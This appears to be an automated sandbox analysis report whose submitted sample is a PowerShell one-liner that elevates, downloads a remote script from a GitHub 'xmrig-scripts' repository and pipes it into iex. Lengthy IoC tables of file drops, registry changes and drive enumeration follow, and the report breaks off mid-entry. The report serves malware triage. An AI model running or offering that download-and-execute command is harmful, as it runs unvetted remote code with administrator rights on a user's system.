Analysis
-
max time kernel
1798s -
max time network
1796s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
15-11-2024 14:44
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win10ltsc2021-20241023-en
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
-
Matrix Ransomware 2 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
msiexec.exeWINWORD.EXEdescription ioc process File created C:\Program Files\Classic Shell\ClassicShellReadme.rtf msiexec.exe File created C:\Program Files\Classic Shell\~$assicShellReadme.rtf WINWORD.EXE -
Matrix family
-
Downloads MZ/PE file
-
Drops file in Drivers directory 12 IoCs
Processes:
MsiExec.exedescription ioc process File created C:\Windows\system32\DRIVERS\SETD19D.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxNetLwf.sys MsiExec.exe File created C:\Windows\system32\DRIVERS\SETB55B.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxSup.sys MsiExec.exe File created C:\Windows\system32\DRIVERS\SETB606.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxUSBMon.sys MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\SETD19D.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\SETB55B.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\SETB606.tmp MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys MsiExec.exe File opened for modification C:\Windows\system32\DRIVERS\SETD8B2.tmp MsiExec.exe File created C:\Windows\system32\DRIVERS\SETD8B2.tmp MsiExec.exe -
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: [email protected]
-
A potential corporate email address has been identified in the URL: [email protected]
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 10 IoCs
Processes:
ClassicShellSetup_4_3_1.exeClassicStartMenu.exeClassicStartMenu.exeClassicStartMenu.exeVirtualBox-7.0.22-165102-Win.exeVirtualBox.exeVBoxSVC.exeVBoxSDS.exeVirtualBoxVM.exeVirtualBoxVM.exepid process 2080 ClassicShellSetup_4_3_1.exe 1080 ClassicStartMenu.exe 5692 ClassicStartMenu.exe 2504 ClassicStartMenu.exe 2824 VirtualBox-7.0.22-165102-Win.exe 5840 VirtualBox.exe 4964 VBoxSVC.exe 5316 VBoxSDS.exe 2676 VirtualBoxVM.exe 2204 VirtualBoxVM.exe -
Loads dropped DLL 64 IoCs
Processes:
RetroBar.exeMsiExec.exeMsiExec.exeClassicStartMenu.exeMsiExec.exeClassicStartMenu.exeClassicStartMenu.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeVirtualBox.exeVBoxSVC.exeVBoxSDS.exeVirtualBoxVM.exepid process 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3320 RetroBar.exe 3608 MsiExec.exe 4912 MsiExec.exe 1080 ClassicStartMenu.exe 3628 3804 MsiExec.exe 3628 5692 ClassicStartMenu.exe 2504 ClassicStartMenu.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 3192 MsiExec.exe 4372 MsiExec.exe 4372 MsiExec.exe 4372 MsiExec.exe 4372 MsiExec.exe 5312 MsiExec.exe 4372 MsiExec.exe 4372 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4772 MsiExec.exe 4372 MsiExec.exe 4372 MsiExec.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 5840 VirtualBox.exe 4964 VBoxSVC.exe 4964 VBoxSVC.exe 5316 VBoxSDS.exe 5316 VBoxSDS.exe 4964 VBoxSVC.exe 2676 VirtualBoxVM.exe 2676 VirtualBoxVM.exe 2676 VirtualBoxVM.exe 2676 VirtualBoxVM.exe 2676 VirtualBoxVM.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
Processes:
MsiExec.exeMsiExec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\StartMenuExt\ = "{E595F05F-903F-4318-8B0A-7F633B520D2B}" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\StartMenuExt\ = "{E595F05F-903F-4318-8B0A-7F633B520D2B}" MsiExec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\StartMenuExt\ = "{E595F05F-903F-4318-8B0A-7F633B520D2B}" MsiExec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\StartMenuExt\ = "{E595F05F-903F-4318-8B0A-7F633B520D2B}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\StartMenuExt MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Classic Start Menu = "\"C:\\Program Files\\Classic Shell\\ClassicStartMenu.exe\" -autorun" msiexec.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5124 powershell.exe 836 powershell.exe 4852 powershell.exe 4676 powershell.exe 2504 powershell.exe 1236 powershell.exe 1536 powershell.exe 5608 powershell.exe 5536 powershell.exe 2792 powershell.exe 5960 powershell.exe 5808 powershell.exe 2300 powershell.exe 1088 powershell.exe 5052 powershell.exe 6072 powershell.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
unregmp2.exemsiexec.exemsiexec.exeVirtualBox-7.0.22-165102-Win.exemsiexec.exewmplayer.exedescription ioc process File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\L: wmplayer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\V: unregmp2.exe File opened (read-only) \??\A: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: wmplayer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe File opened (read-only) \??\G: wmplayer.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\Z: wmplayer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\S: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\G: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\Q: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\H: wmplayer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\W: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\Z: VirtualBox-7.0.22-165102-Win.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: wmplayer.exe File opened (read-only) \??\X: wmplayer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\I: wmplayer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 158 raw.githubusercontent.com 160 camo.githubusercontent.com 165 camo.githubusercontent.com 166 raw.githubusercontent.com 610 camo.githubusercontent.com 619 raw.githubusercontent.com -
Drops file in System32 directory 64 IoCs
Processes:
MsiExec.exeDrvInst.exeDrvInst.exeDrvInst.exemmc.exemsiexec.exeVBoxSDS.exesvchost.exeprintfilterpipelinesvc.exedescription ioc process File created C:\Windows\system32\DRVSTORE\VBoxSup_A787ABFD625D24C81859933DF75DB4CB1D1DB543\VBoxSup.sys MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\VBoxNetLwf.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\c_netservice.inf_amd64_9ab9cf10857f7349\c_netservice.PNF MsiExec.exe File opened for modification C:\Windows\system32\DRVSTORE MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\VBoxUSB.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetadp6.inf_amd64_3abcb7c1789f91b3\VBoxNetAdp6.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD632.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD631.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\VBoxNetLwf.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetlwf.inf_amd64_51425bb36ecf3729\VBoxNetLwf.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\SETB6C4.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\vboxusb.inf_amd64_2faa3f0a43645fa9\VBoxUSB.PNF MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD064.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD065.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD066.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netrass.inf_amd64_7f701cb29b5389d3\netrass.PNF MsiExec.exe File opened for modification C:\Windows\system32\lusrmgr.msc mmc.exe File created C:\Windows\SysWOW64\StartMenuHelper32.dll msiexec.exe File created C:\Windows\system32\StartMenuHelper64.dll msiexec.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\VirtualBox\VBoxSDS.log VBoxSDS.exe File created C:\Windows\system32\DRVSTORE\VBoxSup_A787ABFD625D24C81859933DF75DB4CB1D1DB543\VBoxSup.inf MsiExec.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetadp6.inf_amd64_3abcb7c1789f91b3\VBoxNetAdp6.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\VBoxNetLwf.cat DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netvwififlt.inf_amd64_c5e19aab2305f37f\netvwififlt.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netbrdg.inf_amd64_8a737d38f201aeb1\netbrdg.PNF MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxUSBMon_3FFAF57859D7F88D95E7F2E24CAA859EAE571CD7\VBoxUSBMon.inf MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetlwf.inf_amd64_51425bb36ecf3729\VBoxNetLwf.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netserv.inf_amd64_73adce5afe861093\netserv.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD642.tmp DrvInst.exe File created C:\Windows\system32\DRVSTORE\VBoxUSBMon_3FFAF57859D7F88D95E7F2E24CAA859EAE571CD7\VBoxUSBMon.sys MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\SETB6C3.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\SETB6C4.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\VBoxUSB.sys DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD064.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxusb.inf_amd64_2faa3f0a43645fa9\VBoxUSB.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxusb.inf_amd64_2faa3f0a43645fa9\VBoxUSB.inf DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\WINDOWS\SYSTEM32\WINBIODATABASE\51F39552-1075-4199-B513-0C10EA185DB0.DAT svchost.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxUSBMon_3FFAF57859D7F88D95E7F2E24CAA859EAE571CD7\VBoxUSBMon.cat MsiExec.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\VBoxUSB.inf DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD632.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\netpacer.inf_amd64_7d294c7fa012d315\netpacer.PNF MsiExec.exe File created C:\Windows\System32\DriverStore\FileRepository\netnwifi.inf_amd64_a2bfd066656fe297\netnwifi.PNF MsiExec.exe File created C:\Windows\system32\DRVSTORE\VBoxSup_A787ABFD625D24C81859933DF75DB4CB1D1DB543\VBoxSup.cat MsiExec.exe File created C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD065.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD631.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetlwf.inf_amd64_51425bb36ecf3729\VBoxNetLwf.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\VBoxNetAdp6.sys DrvInst.exe File created C:\Windows\system32\spool\PRINTERS\PP1mg9y2r97tdbddwdzjogsci9b.TMP printfilterpipelinesvc.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\VBoxNetAdp6.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{1d42da8b-f735-2344-bcba-21c09ae5ca57}\SETD642.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{6b27544e-06f3-2c43-a698-4acfda8a36ba}\SETB6C2.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxusb.inf_amd64_2faa3f0a43645fa9\VBoxUSB.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\VBoxNetAdp6.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{89709972-bf90-9943-a509-c129e258e539}\SETD066.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\vboxnetadp6.inf_amd64_3abcb7c1789f91b3\VBoxNetAdp6.inf DrvInst.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
Processes:
mspaint.exemspaint.exemspaint.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Downloads\\OIP.jpg" mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\Untitled.png" mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Downloads\\1920x1200_(Windows_10_versions_1507-1511).jpg" mspaint.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
VirtualBoxVM.exeVirtualBoxVM.exepid process 2676 VirtualBoxVM.exe 2676 VirtualBoxVM.exe 2204 VirtualBoxVM.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exemsiexec.exesetup.exeWINWORD.EXEdescription ioc process File created C:\Program Files\Oracle\VirtualBox\nls\qt_sl.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_tr.qm msiexec.exe File created C:\Program Files\Classic Shell\ClassicShell.chm msiexec.exe File created C:\Program Files\Classic Shell\ClassicShellReadme.rtf msiexec.exe File created C:\Program Files\Classic Shell\Skins\Windows 8.skin msiexec.exe File created C:\Program Files\Classic Shell\Start Screen.lnk~RFe5e5002.TMP msiexec.exe File created C:\Program Files\Oracle\VirtualBox\platforms\qminimal.dll msiexec.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241115144430.pma setup.exe File created C:\Program Files\Classic Shell\~tart Menu Settings.tmp msiexec.exe File created C:\Program Files\Oracle\VirtualBox\sqldrivers\qsqlite.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ka.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_id.qm msiexec.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\81b3e17b-f983-4e8c-b705-6a4cd24f2bef.tmp setup.exe File created C:\Program Files\Classic Shell\HISTORY.txt msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxAudioTest.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VirtualBox.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_en.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_cs.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\ol9_ks.cfg msiexec.exe File created C:\Program Files\Classic Shell\~tart Screen.tmp msiexec.exe File created C:\Program Files\Oracle\VirtualBox\platforms\qwindows.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxBugReport.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxsup\VBoxSup.cat msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\os2_util.exe msiexec.exe File created C:\Program Files\Classic Shell\Skins\Windows XP Luna.skin msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf\VBoxNetLwf.inf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedClipboard.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_pt_BR.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\os2_cid_install.cmd msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxSharedFolders.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\USB\device\VBoxUSB.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\USB\filter\VBoxUSBMon.inf msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5CoreVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDbg.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDDR0.r0 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxGuestControlSvc.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxRT.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_uk.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_fa.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxC.dll msiexec.exe File created C:\Program Files\Classic Shell\Skins\Windows Aero.skin msiexec.exe File created C:\Program Files\Classic Shell\~$assicShellReadme.rtf WINWORD.EXE File created C:\Program Files\Oracle\VirtualBox\styles\qwindowsvistastyle.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\vbox-img.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf\VBoxNetLwf.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\x86\VBoxRT-x86.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_da.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\qt_th.qm msiexec.exe File created C:\Program Files\Classic Shell\Skins\Full Glass.skin msiexec.exe File created C:\Program Files\Classic Shell\Skins\Windows Aero.skin7 msiexec.exe File opened for modification C:\Program Files\Classic Shell\ClassicShellReadme.rtf WINWORD.EXE File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\debian_postinstall.sh msiexec.exe File created C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\VirtualBox_constants.py msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_CN.qm msiexec.exe File created C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\win_postinstall.cmd msiexec.exe File created C:\Program Files\Classic Shell\Skins\Metallic.skin7 msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxDTrace.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxManage.exe msiexec.exe File created C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.dll msiexec.exe File created C:\Program Files\Oracle\VirtualBox\drivers\vboxsup\VBoxSup.sys msiexec.exe File created C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm msiexec.exe -
Drops file in Windows directory 60 IoCs
Processes:
msiexec.exemsiexec.exeMsiExec.exeDrvInst.exemspaint.exeDrvInst.exeDrvInst.exemspaint.exesvchost.exemspaint.exesvchost.exedescription ioc process File opened for modification C:\Windows\Installer\MSI4A45.tmp msiexec.exe File created C:\Windows\Installer\e5e4815.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIB641.tmp msiexec.exe File created C:\Windows\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\StartScreen.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIA488.tmp msiexec.exe File created C:\Windows\INF\oem0.PNF MsiExec.exe File opened for modification C:\Windows\inf\oem5.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIA14A.tmp msiexec.exe File opened for modification C:\Windows\Installer\{E2684146-FB9D-49EC-959F-C4DBAFE50B6C}\IconVirtualBox msiexec.exe File created C:\Windows\Installer\{E2684146-FB9D-49EC-959F-C4DBAFE50B6C}\IconVirtualBox msiexec.exe File opened for modification C:\Windows\Installer\MSIA02D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA0DB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID5A4.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e6d9d6e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA09B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIABEE.tmp msiexec.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Installer\MSIB371.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{E2684146-FB9D-49EC-959F-C4DBAFE50B6C} msiexec.exe File opened for modification C:\Windows\Installer\MSIA516.tmp msiexec.exe File created C:\Windows\inf\oem3.inf DrvInst.exe File opened for modification C:\Windows\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\icon.ico msiexec.exe File opened for modification C:\Windows\Installer\MSIA1F7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB5E3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID033.tmp msiexec.exe File created C:\Windows\inf\oem4.inf DrvInst.exe File created C:\Windows\INF\oem2.PNF MsiExec.exe File created C:\Windows\INF\oem3.PNF MsiExec.exe File opened for modification C:\Windows\Installer\MSIDAA7.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\StartScreen.exe msiexec.exe File opened for modification C:\Windows\Installer\MSID583.tmp msiexec.exe File created C:\Windows\INF\oem1.PNF MsiExec.exe File created C:\Windows\inf\oem5.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\INF\setupapi.dev.log MsiExec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\inf\oem4.inf DrvInst.exe File created C:\Windows\INF\oem5.PNF MsiExec.exe File opened for modification C:\Windows\Installer\e5e4813.msi msiexec.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\e5e4813.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\inf\oem3.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\SourceHash{CABCE573-0A86-42FA-A52A-C7EA61D5BE08} msiexec.exe File opened for modification C:\Windows\Installer\MSIAB9F.tmp msiexec.exe File created C:\Windows\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\icon.ico msiexec.exe File opened for modification C:\Windows\Installer\e6d9d6e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA0FB.tmp msiexec.exe File created C:\Windows\Installer\e6d9d70.msi msiexec.exe File 